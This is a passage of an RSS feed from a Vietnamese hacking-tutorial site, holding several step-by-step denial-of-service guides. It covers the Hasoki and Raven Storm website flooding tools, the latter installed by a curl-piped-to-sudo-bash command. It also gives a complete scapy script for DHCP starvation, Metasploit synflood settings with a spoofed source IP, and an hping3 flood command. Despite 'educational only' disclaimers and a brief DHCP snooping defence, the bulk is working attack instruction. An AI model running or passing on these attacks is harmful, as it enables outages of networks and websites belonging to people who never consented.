<p>Sau khi chạy lệnh file main.py thì giao diện của tool DDoS sẽ hiện lên trong khá đẹp đấy =)). Để bắt đầu vào một cuộc tấn công các bạn nhập <code>help</code> sau đó chọn các hình thức tấn công. Ở đây mình chọn <strong>layer7</strong> để ddos website</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/05/Screenshot-150.png" alt="DDoS with Hasoki" width="579" height="675" title="HASOKI - Công cụ DDoS Website Bypass CloudFlare 33"></p>
<p>&nbsp;</p>
<p>Tại đây, các bạn có rất nhiều lựa chọn hình thức tấn công khác nhau, và mình sẽ chọn hình thức <strong>sky</strong> để bắt đầu cuộc tấn công. Bạn hãy nhập địa chỉ website, nhập số lượng tấn công vừa phải kẻo bị lag máy và sau đó là chọn thời gian ddos</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/05/Screenshot-153.png" alt="HASOKI - Công cụ DDoS Website Bypass CloudFlare 17" width="594" height="712" title="HASOKI - Công cụ DDoS Website Bypass CloudFlare 34"></p>
<p>&nbsp;</p>
<p><strong>Và sau đây là kết quả của cuộc tấn công:</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/05/Screenshot-155.png" alt="HASOKI - Công cụ DDoS Website Bypass CloudFlare 18" width="999" height="674" title="HASOKI - Công cụ DDoS Website Bypass CloudFlare 35"></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/05/Screenshot-156.png" alt="DDoS attacking" width="1278" height="493" title="HASOKI - Công cụ DDoS Website Bypass CloudFlare 36"></p>
<p>Vậy là hết rồi, mình mong các bạn nên sử dụng tool này vào mục đích tốt thôi nhé. Chào tạm biệt ^^</p>
<p><em><strong>Bạn có thể đọc thêm bài viết <a href="https://anonyviet.com/raven-storm-ddos-toolkit-bang-python/">Raven Storm &#8211; DDos Toolkit bằng Python</a> tại Anonyviet </strong></em></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Hasoki hoạt động trên hệ điều hành nào?</h3>
<p>Hasoki hoạt động trên cả Windows và Linux.</p>
<h3>Tôi có thể cài đặt Hasoki như thế nào?</h3>
<p>Hướng dẫn cài đặt chi tiết có sẵn trong bài viết.  Tóm tắt: Trên Windows, sử dụng <code>python setup.py install</code> hoặc <code>pip install -r requirements.txt</code>. Trên Linux, clone repository từ Github, sau đó sử dụng <code>python setup.py install</code> và <code>python main.py</code>.</p>
<h3>Hasoki có hỗ trợ loại tấn công nào?</h3>
<p>Bài viết đề cập đến tấn công Layer7 và ví dụ sử dụng phương thức &#8220;sky&#8221;.  Để biết thêm chi tiết về các loại tấn công khác, vui lòng tham khảo tài liệu trên Github của Hasoki.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/hasoki-cong-cu-ddos-website-bypass-cloudflare/feed/</wfw:commentRss>
			<slash:comments>13</slash:comments>
		
		
			</item>
		<item>
		<title>Raven Storm &#8211; DDos Toolkit bằng Python</title>
		<link>https://anonyviet.com/raven-storm-ddos-toolkit-bang-python/</link>
					<comments>https://anonyviet.com/raven-storm-ddos-toolkit-bang-python/#comments</comments>
		
		<dc:creator><![CDATA[Wdchocopie]]></dc:creator>
		<pubDate>Fri, 01 Apr 2022 00:22:00 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[github]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Raven Storm]]></category>
		<category><![CDATA[toolkit]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=33521</guid>

					<description><![CDATA[Raven Storm là 1 Tool tổng hợp các tool cho phép bạn đánh sập nhiều giao thức khác nhau từ Wifi, thiết bị trong mạng của bạn, Server, Dịch vụ trực tuyến hay thậm chí các thiết bị Bluetooth. Hãy cùng Mình tìm hiểu xem Raven Storm có thể làm những gì nhé! Raven Storm [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Raven Storm là 1 Tool tổng hợp các tool cho phép bạn đánh sập nhiều giao thức khác nhau từ Wifi, thiết bị trong mạng của bạn, Server, Dịch vụ trực tuyến hay thậm chí các thiết bị Bluetooth. Hãy cùng Mình tìm hiểu xem Raven Storm có thể làm những gì nhé!</strong></p>
<h3>Raven Storm &#8211; DDos toolkit</h3>
<p>Raven Storm được phát triển bởi Taguar258 trên GitHub. Raven Storm là 1 dạng của DDos Toolkit hay còn được gọi là Bộ công cụ để DDos (các bạn có thể tham khảo về DDos là gì trong bài GoldenEye – Tool kiểm tra sức chịu đựng DOS của Website<a href="https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/"> tại đây</a>) . Toolkit là 1 dạng Tool tổng hợp nhiều chức năng của nhiều công cụ khác và Raven Storm được tổng hợp từ Nmap, Aircrack và BlueZ. Các tính năng nỏi bật của Raven Storm bao gồm:</p>
<ul>
<li>Raven Storm bao gồm tool cho phép bạn kích hoạt với shortcut và tăng sự hiệu quả của tool lên cao hơn so với thông thường</li>
<li>Raven Storm rất hiệu quả trong việc đánh sập Host Và Server</li>
<li>Giúp người sử dụng hiểu được về các dạng DDos (Layer 3, Layer 4, Layer7)</li>
<li>Có thể giúp người dùng kết nối với các Clients để tạo Botnet</li>
<li>Có thể tấn công nhiều protocol hay các giao thức khác nhau như UDP/TCP, ICMP, HTTP, L2CAP, ARP và IEEE.</li>
</ul>
<h3>Các Module Raven Strom sử dụng</h3>
<ul>
<li>Ping -&gt; L3</li>
<li>Dịch vụ udp/tcp -&gt; L4</li>
<li>websites -&gt; L7</li>
<li>Thiết bị lân cận -&gt; arp</li>
<li>Thiết bị Bluetooth -&gt; BL</li>
<li>Wifi -&gt; Wifi (các bạn cần Card wifi hỗ trợ RFMON hoặc USB Wifi có hỗ trợ Hack Wifi)</li>
<li>Botnet -&gt; Server</li>
</ul>
<p><strong>Chú ý</strong>: Hãy thử sử dụng L4 nếu L7 không hoạt động</p>
<h3 id="ftoc-mot-so-luu-y-truoc-khi-thuc-hien" class="ftwp-heading">Một số lưu ý trước khi thực hiện</h3>
<ul>
<li>Tuyệt đối không Dos/DDos Anonyviet và những Website bạn không thuộc quyền sở hữu hay quản lý. Anonyviet sẽ không chịu trách nhiệm với các hành vi phá hoại của các bạn.</li>
<li><span style="color: #0000ff;">Chỉ được sử dụng Tool để kiểm thử hệ thống của bạn</span></li>
<li>Sử dụng Tool này với số lượng Thread vừa phải tránh việc máy có thể bị Lag hoặc treo ngay lập tức</li>
<li>Sử dụng Tool Trên các hệ điều hành Linux</li>
</ul>
<h3>Hướng dẫn sử dụng Raven Storm</h3>
<h4>Cài đặt</h4>
<p>Các bạn chạy lệnh sau để cài tất cả Tool và phần mềm trong 1 câu lệnh</p>
<p><code>curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s</code></p>
<h4>Sử dụng</h4>
<p>Để khởi động Chương Trình, Các bạn chạy câu lệnh sau:</p>
<p><code>sudo rst</code></p>
<p>Giao diện của Tool</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/a-4.jpg" alt="Giao diện Raven Storm" width="443" height="440" title="Raven Storm - DDos Toolkit bằng Python 40"></p>
<p>Mình sẽ thử tấn công website sử dụng Module L7</p>
<p>Đầu tiên nhập <code>l7</code> vào terminal</p>
<p>&nbsp;</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/a-7.jpg" alt="Raven Storm L7" width="731" height="215" title="Raven Storm - DDos Toolkit bằng Python 41"></p>
<p>Đầu tiên các bạn Set target bằng câu lệnh sau</p>
<p><code>target</code></p>
<p>sau khi nhập xong thì các bạn nhập URL của website nhé</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/a-8.jpg" alt="Website URL" width="387" height="120" title="Raven Storm - DDos Toolkit bằng Python 42"></p>
<p>Tiếp theo Set Threads bằng câu lệnh sau</p>
<p><code>Threads</code></p>
<p>Sau khi nhập xong thì nhập số thread mà bạn mong muốn</p>
<p>Để khởi động chạy lệnh sau</p>
<p><code>run</code></p>
<p>Vậy là mình vừa hướng dẫn sử <a href="https://github.com/anonyvietofficial/Raven-Storm" target="_blank" rel="noopener">Raven Storm</a> DDos Toolkit bằng python. Anh em thấy tool này có hữu dụng không? Hãy để lại bình luận phía bên dưới để mình biết nhé. Xem thêm: Cách DDoS Layer 7 bằng Overload thử sức chịu tải của Website <a href="https://anonyviet.com/cach-ddos-layer-7-bang-overload-thu-suc-chiu-tai-cua-website/">tại đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Raven Storm hoạt động trên hệ điều hành nào?</h3>
<p>Raven Storm hoạt động tốt nhất trên hệ điều hành Linux.</p>
<h3>Tôi có thể sử dụng Raven Storm để tấn công bất kỳ website nào không?</h3>
<p>Không.  Chỉ sử dụng Raven Storm để kiểm thử hệ thống của bạn hoặc trên các hệ thống mà bạn có quyền truy cập đầy đủ.  Việc sử dụng công cụ này để tấn công các website khác mà không có sự cho phép là bất hợp pháp.</p>
<h3>Nếu Module L7 không hoạt động, tôi nên làm gì?</h3>
<p>Hãy thử sử dụng Module L4.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/raven-storm-ddos-toolkit-bang-python/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Cách tấn công DoS DHCP Server bằng Python</title>
		<link>https://anonyviet.com/cach-tan-cong-dos-dhcp-server-bang-python/</link>
					<comments>https://anonyviet.com/cach-tan-cong-dos-dhcp-server-bang-python/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 27 Mar 2022 00:19:06 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=40415</guid>

					<description><![CDATA[DHCP là giao thức cấp IP động cho các thiết bị trong hê thống mạng, ví dụ khi điện thoại, máy tính kết nối Wifi, thiết bị sẽ được cấp 1 IP dung để giao tiếp với các thiết bị khác. IP đó được cấp bởi máy chủ DHCP trong hệ thống mạng của bạn. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>DHCP là giao thức cấp IP động cho các thiết bị trong hê thống mạng, ví dụ khi điện thoại, máy tính kết nối Wifi, thiết bị sẽ được cấp 1 IP dung để giao tiếp với các thiết bị khác. IP đó được cấp bởi máy chủ DHCP trong hệ thống mạng của bạn. Vậy chúng ta hãy nghỉ thử xem, điều gì sẽ xảy ra khi các hacker ngăn chặn và tấn công máy chủ DHCP ? Đương nhiên sẽ không có kết nối mạng cũng như là Internet. Chúng ta thường gọi kiểu tấn công này là <a href="https://anonyviet.com/tan-cong-ddos-la-gi/"><span style="color: #ff0000;">DoS (Từ chối dịch vụ)</span></a>. Theo như mình thấy thì mỗi máy chủ DHCP có số lượng địa chỉ IP được xác định chính xác có thể cung cấp cho các thiết bị. Vậy thì chúng ta sẽ đi tìm hiểu qua về kiểu tấn công máy chủ DHCP nha !</strong></p>
<p><span style="color: #ff0000;"><strong>Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục, vui lòng các bạn không nên thực hiện những hành vi xấu liên quan đến pháp luật. Anonyviet sẽ không chịu trách nhiệm bất cứ hành vi bất hợp pháp !</strong></span></p>
<h2><span style="color: #0000ff;"><strong>DoS DHCP ATTACK</strong> </span></h2>
<p>Đây là một kiểu tấn công yêu cầu tất cả các địa chỉ IP bằng cách ghi đè một số lượng lớn địa chỉ MAC không có thật, máy chủ sẽ không có bất kì địa chỉ IP nào cho các thiết bị. Mình thấy cuộc tấn công này rất nguy hiểm, nó còn tạo cho hacker có cơ hội nắm bắt được các lưu lượng truy cập. Nếu hacker đã tấn công làm cho máy chủ DHCP ngừng hoạt động, lúc này hacker có thể tạo ra một máy chủ DHCP cho riêng mình. Cụ thể là các DNS giả mạo có thể đã được cung cấp cấu hình DHCP và sau đó hacker có thể xâm phạm bạn bất cứ lúc nào mà bạn không hề biết. Cuộc tấn công này kết hợp với các cuộc tấn công <a href="https://vi.wikipedia.org/wiki/T%E1%BA%A5n_c%C3%B4ng_xen_gi%E1%BB%AFa" target="_blank" rel="noopener"><span style="color: #ff0000;"><strong>Man-In-The-Middle(Tấn Công Xen Giữa)</strong></span></a> thì cực kì nguy hiểm luôn.</p>
<h2><strong><span style="color: #0000ff;">Tấn công DoS máy chủ DHCP đơn giản bằng Python</span></strong></h2>
<p>Để thực hiện cuộc tấn công DoS này, bạn hãy mở terminal và nhập lệnh sau <code>pip install scapy</code> hoặc <code>pip3 install scapy</code> sau đó tạo một file có phần mở rộng là<strong> .py</strong> rồi  copy đoạn code sau:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">#!/usr/bin/env python3
from scapy.all import *

dhcp_attack = Ether(dst='ff:ff:ff:ff:ff:ff',src=RandMAC())  \
                     /IP(src='0.0.0.0',dst='255.255.255.255') \
                     /UDP(sport=68,dport=67) \
                     /BOOTP(op=1,chaddr = RandMAC()) \
                     /DHCP(options=[('message-type','discover'),('end')])

sendp(dhcp_attack,iface='wlan0',loop=1,verbose=1)
</pre>
<p>Ở đoạn code ngắn trên, mình đã gọi module scapy vừa tải về sau đó mình đã tạo một biến có tên là <code>dhcpt_attack</code> , trong biến đó mình đã thiết lập cho cuộc cấn tông bao gồm địa chỉ mac và ip giả tại <code>Ether</code> và <code>IP</code> còn lại là mình đã thiết lập cổng và random địa chỉ mac sau đó là phần cài đặt gói gửi đến máy chủ DHCP. Tại dòng code cuối thì các bạn hãy điều chỉnh <code>iface</code> của các bạn vào nhé. Hiện tại mình đang dùng iface đang kết nối với mạng nhà mình là wlan0 nên mình sẽ đặt iface là wlan0. Còn iface của các bạn là gì thì hãy đặt vô nha</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/03/ddos-dhcp-server.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/03/ddos-dhcp-server.png" alt="ddos dhcp server" width="674" height="345" title="Cách tấn công DoS DHCP Server bằng Python 46"></a></p>
<p>Sau khi làm xong tất cả các bước trên. Bây giờ bạn chỉ cần mở terminal và trỏ đến file .py mà các bạn vừa tạo, ở đây mình đã đặt tên file là dhcp.py nên mình sẽ chạy lệnh sau để bắt đầu một cuộc tấn công DoS vào máy chủ DHCP <code>python3 dhcp.py</code>. Còn đây là kết quả của cuộc tấn công DoS DHCP nè</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/03/Screenshot-56.png" alt="DoS DHCP " width="524" height="175" title="Cách tấn công DoS DHCP Server bằng Python 47"> <img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/03/Screenshot-57.png" alt="bắt gói tin tấn công DoS" width="1365" height="728" title="Cách tấn công DoS DHCP Server bằng Python 48"></p>
<p>Các bạn có thể thấy trong ảnh đó, các gói tin của cuộc tấn công gửi đến máy chủ DHCP rất nhanh, khiến cho hệ thống chập chờn dẫn đến là mất kết nối internet. Thật là kinh đúng không nào !</p>
<h2><strong><span style="color: #0000ff;">Cách ngăn chặn tấn công DoS máy chủ DHCP</span></strong></h2>
<p>Để ngăn chặn các cuộc tấn công DoS vào máy chủ DHCP, hãy bật tính năng <strong>DHCP snooping</strong> trên thiết bị và sau đó đặt số lượng truy cập tối đa máy khách DHCP được phép trên thiết bị hoặc giao diện. Chỉ số lượng máy khách DHCP được phép mới có thể lấy địa chỉ IP thông qua thiết bị hoặc giao diện.</p>
<p>Bạn có thể bật thiết bị để kiểm tra xem địa chỉ MAC trong tiêu đề khung Ethernet có khớp với giá trị của trường CHADDR trong thông báo DHCP hay không. Nếu hai giá trị khớp nhau, tin nhắn sẽ được chuyển tiếp. Nếu không, tin nhắn sẽ bị hủy.</p>
<p><strong>Vì vậy mình mong rằng bạn học được điều gì đó từ bài viết này và cũng mong rằng các bạn cũng không nên sử dụng vào các mục đích xấu từ cuộc tấn công DoS này he. Chúc các bạn có một ngày tốt lành và làm việc hiệu quả ! Bye Bye</strong></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tôi có thể sử dụng mã Python này cho mục đích gì?</h3>
<p>Mã Python trong bài viết này chỉ được dùng cho mục đích giáo dục và nghiên cứu về bảo mật.  Việc sử dụng mã này cho bất kỳ hoạt động bất hợp pháp nào đều bị nghiêm cấm.</p>
<h3>Làm thế nào để ngăn chặn cuộc tấn công DoS vào máy chủ DHCP?</h3>
<p>Bật tính năng DHCP snooping trên thiết bị mạng và đặt giới hạn số lượng máy khách DHCP được phép truy cập.  Thiết bị sẽ kiểm tra sự khớp giữa địa chỉ MAC và CHADDR trong gói DHCP để ngăn chặn các gói tin giả mạo.</p>
<h3>Scapy là gì và tôi cần cài đặt nó như thế nào?</h3>
<p>Scapy là một thư viện Python dùng để chế tạo và phân tích các gói tin mạng. Bạn có thể cài đặt nó bằng lệnh <code>pip install scapy</code> hoặc <code>pip3 install scapy</code> trong terminal.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-tan-cong-dos-dhcp-server-bang-python/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3</title>
		<link>https://anonyviet.com/cach-thuc-hien-mot-cuoc-tan-cong-dos-don-gian-voi-metasploit-va-hping3/</link>
					<comments>https://anonyviet.com/cach-thuc-hien-mot-cuoc-tan-cong-dos-don-gian-voi-metasploit-va-hping3/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Wed, 02 Mar 2022 00:26:45 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[cách ddos]]></category>
		<category><![CDATA[how to ddos]]></category>
		<category><![CDATA[Đos]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=39844</guid>

					<description><![CDATA[Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục vui lòng không thực hiện những hành động bất hợp pháp và Anonyviet sẽ không chịu trách nhiệm mọi bất cứ hành vi phạm pháp nào của các bạn Trong bài viết này, mình sẽ hướng dẫn cho các bạn cách tấn công [&#8230;]]]></description>
										<content:encoded><![CDATA[<p style="text-align: left;"><span style="color: #ff0000; font-size: 12pt;"><strong>Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục vui lòng không thực hiện những hành động bất hợp pháp và Anonyviet sẽ không chịu trách nhiệm mọi bất cứ hành vi phạm pháp nào của các bạn</strong></span></p>
<p>Trong bài viết này, mình sẽ hướng dẫn cho các bạn cách tấn công DoS hoặc DDoS với công cụ Metasploit và Hping3 nhé. Những cách thức thực hiện khá là đơn giản và nhanh gọn, chỉ chưa đầy 3 phút bạn cũng đã có thể tạo ra một cuộc tấn công khá mạnh mẽ với số lượng Packets được gửi đi rất nhanh khiến cho máy của nạn nhân dẫn đến tình trạng tăng CPU đột ngột, mạng bị chập chờn hoặc bị nặng hơn là treo máy. Vì vậy mình khuyên các bạn nên test với số lượng packets vừa đủ là ok rồi. Còn bây giờ mình sẽ giới thiệu sơ qua về Metasploit và Hping3.</p>
<h2><span style="font-size: 18pt; color: #0000ff;"><strong>Metasploit </strong></span></h2>
<p>Là một công cụ có tên gọi đầy đủ là Metasploit Framework đây là công cụ khai thác các lỗ hổng bảo mật được sử dụng nhiều nhất trên thế giới. Không những thế, còn giúp cho các nhà bảo mật thử nghiệm các cuộc thâm nhập và xác minh các lỗ hổng bảo mật sau đó họ sẽ đánh giá về lỗ hổng và nâng cao nhận thức về bảo mật. Metasploit được viết ngôn ngữ Ruby và nhiều ngôn ngữ khác như: Python, C,&#8230; để tạo ra các cuộc khai thác và tấn công trên nhiều loại hệ thống khác nhau như: Windows, Linux, WordPress,&#8230;vv. Như vậy, mình đã giới thiệu qua xong về Metasploit rùi. Ngoài ra, bạn cũng có thể dụng Metasploit để <a href="https://anonyviet.com/cach-su-dung-metasploit-de-tan-cong-mang-co-ban-nhat/">tấn công mạng,</a> <a href="https://anonyviet.com/hack-windows-10-tu-xa-qua-internet-voi-metasploit/">hack Windows từ xa</a>, hoặc<a href="https://anonyviet.com/dot-nhap-vao-mot-may-tinh-bat-ky-trong-mang-lan-voi-beef-mitmf-veil-evasion-metasploit/"> đột nhập máy tính</a> trong các bài viết của Anonyviet nhé ^^.</p>
<p><b>Xem tất cả bài viết về <a href="https://anonyviet.com/?s=Metasploit">cách sử dụng Metasploit</a> để tấn công kiểm thử hệ thống.</b></p>
<h2><span style="color: #0000ff;"><strong><span style="font-size: 18pt;">Hping3</span></strong></span></h2>
<p>Là một công cụ mạng có thể gửi các gói ICMP/UDP/TCP (tùy bạn chỉnh nha) và hiển thị các câu trả lời đích giống như Ping thực hiện với các câu trả lời ICMP. Ngoài ra, nó còn xử lý phân mảnh và kích thước và nội dung gói tùy ý, có thể được sử dụng để truyền tệp theo các giao thức được hỗ trợ. Việc sử dụng Hping3, bạn có thể kiểm tra các tường lửa, thực hiện quét các cổng giả mạo, kiểm tra hiệu suất mạng bằng nhiều thức khác nhau, và thực hiện các hành động giống như theo dõi trong các giao thức khác. Hping3 được viết ngôn ngữ Tcl</p>
<p><strong>Tìm hiểu rõ hơn về Hping3 <a href="https://en.wikipedia.org/wiki/Hping" target="_blank" rel="noopener">tại đây</a></strong></p>
<p>Để hiểu về tấn công DoS hoặc DDoS bạn có thể đọc bài viết đó <a href="https://anonyviet.com/tan-cong-ddos-la-gi/">tại đây</a>. Không luyên thuyên nữa vào vấn đề luôn nào ^^</p>
<h2><span style="font-size: 18pt; color: #0000ff;"><strong>Cách tạo ra một cuộc tấn công DoS đơn giản bằng Metasploit và Hping3</strong></span></h2>
<p>Metasploit và Hping3 là công được giới thiệu trong chương trình CEH</p>
<h3><strong><span style="color: #ff0000; font-size: 14pt;">Tấn công DoS với Metasploit</span></strong></h3>
<p>Ở bài viết này, mình sẽ chỉ cho các bạn cách tấn công DoS bằng phương pháp SYN Flood nhé. Còn ai chưa hiểu rõ cách tấn công này có thể tìm hiểu<a href="https://en.wikipedia.org/wiki/SYN_flood" target="_blank" rel="noopener"><strong> ở đây</strong></a> Để thực hiện cuộc tấn công trước tiên hãy mở Terminal lên và nhập lệnh <code>msfconsole</code></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/b-1.png" alt="Dos with Metasploit" width="647" height="654" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 58"></p>
<p>Tiếp theo chúng ta nhập dòng lệnh <code>use auxiliary/dos/tcp/synflood</code> trên thanh Terminal của Metasploit</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/c-1.png" alt="SYN FLOOD" width="655" height="624" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 59"></p>
<p>Tiếp đến, bạn nhập <code>show options</code> để hiện thị các phần cài đặt tùy chỉnh</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/d-1.png" alt="Options DOS" width="653" height="624" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 60"></p>
<p>Ở đây, chúng ta chú ý đến phần:</p>
<ul>
<li><code>NUM</code>: số lượng Packet cần gửi</li>
<li><code>RHOSTS</code>: Địa chỉ IP máy tính của nạn nhân</li>
<li><code>RPORT</code>: Cổng đang hoạt động trên máy tính của nạn nhân</li>
<li><code>SHOST</code>: Địa chỉ IP bất kì mà bạn muốn đặt. <em>Ví dụ địa chỉ IP bất kì mình muốn đặt là</em>: <span style="color: #0000ff;"><code>172.0.0.1</code></span></li>
<li><code>SPORT</code>: Cổng bất kì ( Phần này không cần cũng được )</li>
<li><code>TIMEOUT</code>: Thời gian chờ</li>
</ul>
<p>Bước tiếp đến là chúng ta sẽ tiến hành cài đặt cuộc tấn công này</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/03/ddos-hping-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/03/ddos-hping-1.jpg" alt="ddos hping" width="676" height="391" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 61"></a></p>
<ul>
<li><code>set RHOSTS &lt;ip máy tính nạn nhân&gt;</code></li>
<li><code>set RPORT &lt;cổng máy tính nạn nhân đang hoạt động&gt;</code></li>
<li><code>set NUM &lt;số lượng Packets cần gửi&gt;</code></li>
<li><code>set SHOST &lt;ip giả mạo&gt;</code></li>
<li><code>set TIMEOUT &lt;thời gian chờ&gt;</code></li>
</ul>
<p>Tại đây mình đã cài đặt cho cuộc tấn công như sau</p>
<ul>
<li><code>set rhosts 192.168.0.112</code></li>
<li><code>set rport 80</code></li>
<li><code>set num 0</code></li>
<li><code>set shost 172.0.0.1</code></li>
<li><code>set timeout 10000</code></li>
</ul>
<p>Để bắt đầu cuộc tấn công chúng ta chỉ cần nhập <code>exploit</code>rồi nhấn <strong>Enter</strong> để bắt đầu tấn công</p>
<p>Bạn nào không biết cổng nào đang hoạt động trên máy tính nạn nhân chúng ta sẽ sử dụng <strong>Nmap</strong> để quét cổng nhé.</p>
<p><code>nmap -p &lt;cổng cần quét&gt; &lt;ip máy tính nạn nhân&gt;</code>hoặc <code>nmap -sV &lt;ip nạn nhân&gt;</code></p>
<p>Ví dụ: <code>nmap -p 443 192.168.0.112</code> hoặc <code>namp -sV 192.168.0.112</code></p>
<p><strong>Sau đây là kết quả của cuộc tấn công</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/f-1.png" alt="kết quả tấn công dos" width="1356" height="636" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 62"></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/g.png" alt="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 22" width="661" height="585" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 63"></p>
<p>Chúng ta có thể sử dụng công cụ <strong>Wireshark</strong> để bắt các Packets đang gửi. Giờ đến phần tiếp theo nào ^.^</p>
<h3><span style="font-size: 14pt; color: #ff0000;"><strong>Tấn công DoS với Hping3</strong></span></h3>
<p>Cách thức thực hiện khá là nhanh và đơn giản. Chỉ với một câu lệnh ngắn bạn đã tạo ra một cuộc tấn công khá mạnh mẽ rồi.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/h.png" alt="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 23" width="590" height="537" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 64"></p>
<p>Câu lệnh sẽ như sau: <code>hping3 &lt;ip máy nạn nhân&gt; --flood</code> và sau đây là kết quả nè</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/02/bat-goi-tin.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/02/bat-goi-tin.jpg" alt="bat goi tin" width="1017" height="499" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 65"></a></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/02/Screenshot-114.png" alt="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 24" width="659" height="585" title="Cách thực hiện một cuộc tấn công DOS đơn giản với Metasploit và Hping3 66"></p>
<p>Uầy, Nếu như mà chúng ta kết hợp cả Metasploit và hping3 tấn công vào một máy thì không biết kết quả sẽ như thế nào nhỉ ?</p>
<p><strong>Vậy là mình đã chỉ dẫn xong rồi nhé. Còn bây giờ xin chào và tạm biệt các bạn. Chúc các bạn có một lành tốt lành và làm việc học tập hiệu quả !</strong></p>
<p><em><strong>Bạn có thể đọc thêm bài viết<a href="https://anonyviet.com/huong-dan-viet-tool-ddos-don-gian-bang-python/"> Cách viết Tools DDoS đơn giản bằng Python </a></strong></em></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Metasploit và Hping3 là gì và chúng hoạt động như thế nào trong cuộc tấn công DoS?</h3>
<p>Metasploit là một framework khai thác bảo mật cho phép thực hiện các cuộc tấn công DoS. Hping3 là một công cụ mạng gửi các gói tin với tốc độ cao, gây quá tải mạng và làm sập dịch vụ.  Trong bài viết, cả hai công cụ được sử dụng để thực hiện một cuộc tấn công DoS bằng cách gửi một lượng lớn các gói tin tới máy nạn nhân.</p>
<h3>Tôi có thể sử dụng các công cụ này để tấn công bất kỳ máy nào không?</h3>
<p>Không.  Việc sử dụng các công cụ này để tấn công các hệ thống mà bạn không có quyền truy cập là bất hợp pháp. Bài viết này chỉ nhằm mục đích giáo dục và minh họa cách thức hoạt động của các cuộc tấn công DoS.  Bạn chỉ nên thực hiện các thử nghiệm trên hệ thống của riêng mình hoặc hệ thống mà bạn đã được cho phép.</p>
<h3>Có cách nào để phòng tránh các cuộc tấn công DoS không?</h3>
<p>Có nhiều biện pháp phòng tránh, bao gồm sử dụng tường lửa, hệ thống phát hiện và ngăn chặn xâm nhập (IDS/IPS), và các kỹ thuật giảm thiểu tấn công DoS như rate limiting.  Việc thiết lập các chính sách bảo mật mạnh mẽ cũng rất quan trọng.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-thuc-hien-mot-cuoc-tan-cong-dos-don-gian-voi-metasploit-va-hping3/feed/</wfw:commentRss>
			<slash:comments>6</slash:comments>
		
		
			</item>
		<item>
		<title>Hướng dẫn viết Tool DDoS đơn giản bằng Python</title>
